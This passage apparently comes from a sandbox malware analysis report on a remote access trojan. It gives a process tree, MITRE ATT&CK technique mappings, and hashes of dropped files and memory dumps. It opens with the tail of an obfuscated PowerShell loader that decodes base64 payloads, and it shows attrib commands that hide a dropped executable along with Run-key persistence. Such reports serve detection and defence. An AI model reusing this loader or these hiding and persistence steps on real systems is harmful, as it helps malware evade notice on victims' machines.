([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:3552
        
        C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1396
        
        C:\Windows\System32\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system\system.exe"
        7⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEFF.tmp.bat""
        7⤵
        
        PID:836
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:1988
        
        C:\Users\Admin\system\system.exe
        
        "C:\Users\Admin\system\system.exe"
        8⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:2492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\S500RAT.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b70bb42b5f053a986ba1a544817bf722

SHA1
c26f5c74ae56f37efbe7ce61a1a15bd5cc215f13

SHA256
b15e56fef36d411e28adfaf6914511300756706527fcfa65598177f5f6a0299b

SHA512
1ce6c9261bdc04cab0264689da6a70e3943d7b7db0adb375cf7cfc71ff8505127047f0b9b52ed6e707b6bf388baeafe735955aa4e4ccf231085ff91de2605292

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3a1dcaa185df4a80fe8d491144b3b680

SHA1
d452bba5a6647ccd5c6e3fea14107c3bf35063e7

SHA256
e9673805d0d95ee44d4151a5a68c98d076ae4667fe3c962d8f9506ead2ee7c9d

SHA512
0f931a4b96fde4ceefe7c59ed887a36aa3d9f8f5fbe1b69875c9675c7a2d37b6c066d35a29214a778853ef47225de03cbe9b5ae16c2aa7470316bd322ab12625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8a752033a0d4199707542bc49b9a3ba2

SHA1
ff77e358b651cc12fd7a3e22192b40ccf4fa0757

SHA256
b92c4cd0cab9df58c1812aa031f8ab2c60ac5b52b21b54cc3ba0360d445ad4e9

SHA512
23ba3ebc60d915b10ec39bac81fc4746c802b4bb5686e4d675ea32d5cf560f1505d591d91e637412ad075380a847ed52f4107f4832572fe1121d73aed551d841

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96e3b86880fedd5afc001d108732a3e5

SHA1
8fc17b39d744a9590a6d5897012da5e6757439a3

SHA256
c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294

SHA512
909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e60eb305a7b2d9907488068b7065abd3

SHA1
1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

SHA256
ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

SHA512
95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
98386e443162bf8753c68db023578ea7

SHA1
4af2b57e1f1dfecebae752e5a67be4851308b2dd

SHA256
712c1cc213178f82b49255530a999119ed8c4cda8851a3ff8ce1dc03e5fee798

SHA512
e39ff9f910ef5c96eeee268387766d9eecd67936191f0a193e94e191232b6852fb3be7965727d9d1d915833ae4a5e88c1a27705cc763b1856b2cc96a77d95436

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dbbf71e9fb59f80938f09809b160e441

SHA1
8b9a517d846cb9a0a284f77ed88328236a85055f

SHA256
e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

SHA512
90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1cc5e033811a5d520bb4a6904b5c433b

SHA1
c159a342ed372790600b3a6ac97e274638a0ce9a

SHA256
9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

SHA512
dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
60945d1a2e48da37d4ce8d9c56b6845a

SHA1
83e80a6acbeb44b68b0da00b139471f428a9d6c1

SHA256
314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

SHA512
5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat

Filesize
262KB

MD5
ad0c8112fc6de16730b2c05452bd5a5d

SHA1
de5c18c8b52136d3f36eb309d2cab5a94217b80f

SHA256
3ca4327561a8b88204b8716306fccf8815ba3ea515d5f213c810355fa66d19c7

SHA512
5d854c0cb895c989d06b49b7004ef2747dbbd3225f066cd84792e9c99238f03cd63b3943729a7853b00b49492d5ab0525b37999a97f23a46ce1486ede770f780

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hygt5juk.cvk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\invoicer.bat

Filesize
284KB

MD5
f4d1ac2353407590dd8f02cac6b2104a

SHA1
9681117cd8ea67bc8b3907004e9ce808ca0187ec

SHA256
3c7c299737de3ff60f8c30f000c0a9f3454396acc1dce473e1e1a2696bbc67b7

SHA512
7d4e6dbf7ea33a5a020df56e001928ef8b387b8d7eae8d26f5f591790553ab102a7186cd39ef937ab895976b504ae4a2540b7f2405a7d2ab81fbb87575da2082

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEFF.tmp.bat

Filesize
140B

MD5
07f7749cf6299698205e27ed0ea95cc4

SHA1
c2fa990de1ac1f55e7a64e857b16855693f21638

SHA256
181cf1d70510803a08ec5ef763e7dd4c61b12f268a4af0516ddcfcb5dae29efa

SHA512
88dcfbcf19afd6d0d5c30012832bdaec4ac0140e39745b4ad41f81599697b37f26ca48bb1759178a95ad8e2b4b7881b3bd614edab30ff9ad493c1940a2a0e06c

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_41.vbs

Filesize
114B

MD5
d8a2f8b8da91a8def1dd69e670dd7d35

SHA1
f6f77c2029d17a91f98d991030f3d449e90bff3d

SHA256
27c4ae99c726cf59a819539fd192f9bd1f6e9a89d2b0b14c500049b91f5867e1

SHA512
b7414e277833378eb113d913c9716683ee45d0206d35956013d33244c14259a69a8389ad5fb14de6e2888f0e33ec894e5e070bf4b0c2c535e9a3be1c2605353b

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_478.vbs

Filesize
115B

MD5
81ecdb4bd09be33480bc1d3f47e9d30a

SHA1
41c5c8bd3f950db969f8128212ceee73895be64f

SHA256
0cec544977823cec6a873a0ef7ae2a9aab8b93e99d913644f15d76e5ad996987

SHA512
14eed8fe932a81addf82e219164b07230f412fa74bcb4ad655b49dfd251344971fa6e05a501266160537d4383813364660f87065a7c0e9164a758a23f2e4b256

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_633.vbs

Filesize
115B

MD5
e79e62f06160a0d191136c485b827638

SHA1
fc786feb6b16dfdaf316cc73dfd37ed17afe5d48

SHA256
05738327b7c458bd6401c34ff788303b98950f0e70ba1a053cf72a0e5c69fdea

SHA512
0e7c34cf598d0feeb0cc7e4f2f158b5e5475fa73e708964e94a9d0d887fc851f40a48a02eb496e3db86a802ab9f26ccb8e82a961bf8f755d637ceaa47607fc8f

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_670.vbs

Filesize
115B

MD5
c4465e67381373268fd6479aab3dcf1a

SHA1
fb4067dc0197e488cf410996a71e4bf150c16708

SHA256
ced44efebd08cd2a6dd3c3af831e5a86ba41c66a5b0655ff0b5497dd1d0723e6

SHA512
7387401fba73e056089ff6d46453d37b7c43bacfc0a186fdae9df3959380e3c7a4caf0c669d6e66eaccdcbb312d4cf2be4ff29df710e372fbc4a07e5a351d7a9

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_713.vbs

Filesize
115B

MD5
79c4f997290c98d5d91a8415d3d3076a

SHA1
2c0cf17ef5d0759f5b6ad809d543d46e1e15ce2d

SHA256
3b9fc4c5457b3ae8527625d5193335387e051e089ba9a1e73864d85125f7c2a2

SHA512
e5f74ef778e383aaa462c16b0e221374f677c369035622409a1fd11cf377f0fbc72276550867014fee7049ec7ecefb395210827140d9175d9cb1f06edd19ba11

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_91.vbs

Filesize
114B

MD5
1bd38ee8621818148cb34d4b5a887231

SHA1
f9d23b5b1a676c1019c544008c4adfd8eaa6443b

SHA256
893055a45eb848e23d16d2df62fd4cdf14647983b5105f5c8a59cb11b7096f4a

SHA512
6764d7087ce6bda6224fb89291bfa49b4c14b47add417b0592103065b1348d323f248a1dc84cb235d2b92e7fe1552eb78b46f5fef977d4bfa8d577c6f21294ab

Download Submit
C:\Users\Admin\system\system.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/808-80-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/808-3-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/1532-237-0x000001904F0A0000-0x000001904F0B6000-memory.dmp

Filesize
88KB

Download
memory/2200-322-0x0000020D70430000-0x0000020D70446000-memory.dmp

Filesize
88KB

Download
memory/2492-357-0x0000027D72610000-0x0000027D72686000-memory.dmp

Filesize
472KB

Download
memory/2492-356-0x0000027D721C0000-0x0000027D72204000-memory.dmp

Filesize
272KB

Download
memory/2704-39-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/2704-0-0x00007FF820BB3000-0x00007FF820BB5000-memory.dmp

Filesize
8KB

Download
memory/2704-1-0x0000000000460000-0x0000000001790000-memory.dmp

Filesize
19.2MB

Download
memory/2704-2-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3552-227-0x00000134EECD0000-0x00000134EECDE000-memory.dmp

Filesize
56KB

Download
memory/3616-4-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3616-18-0x000001D932F40000-0x000001D93315C000-memory.dmp

Filesize
2.1MB

Download
memory/3616-15-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3616-19-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3616-5-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3616-16-0x000001D933400000-0x000001D933422000-memory.dmp

Filesize
136KB

Download
memory/3836-102-0x000002BA5B250000-0x000002BA5B258000-memory.dmp

Filesize
32KB

Download
memory/3836-112-0x000002BA5B290000-0x000002BA5B2C4000-memory.dmp

Filesize
208KB

Download
memory/4936-81-0x000001365EC50000-0x000001365EC58000-memory.dmp

Filesize
32KB

Download
memory/4936-82-0x0000013677F30000-0x0000013677F68000-memory.dmp

Filesize
224KB

Download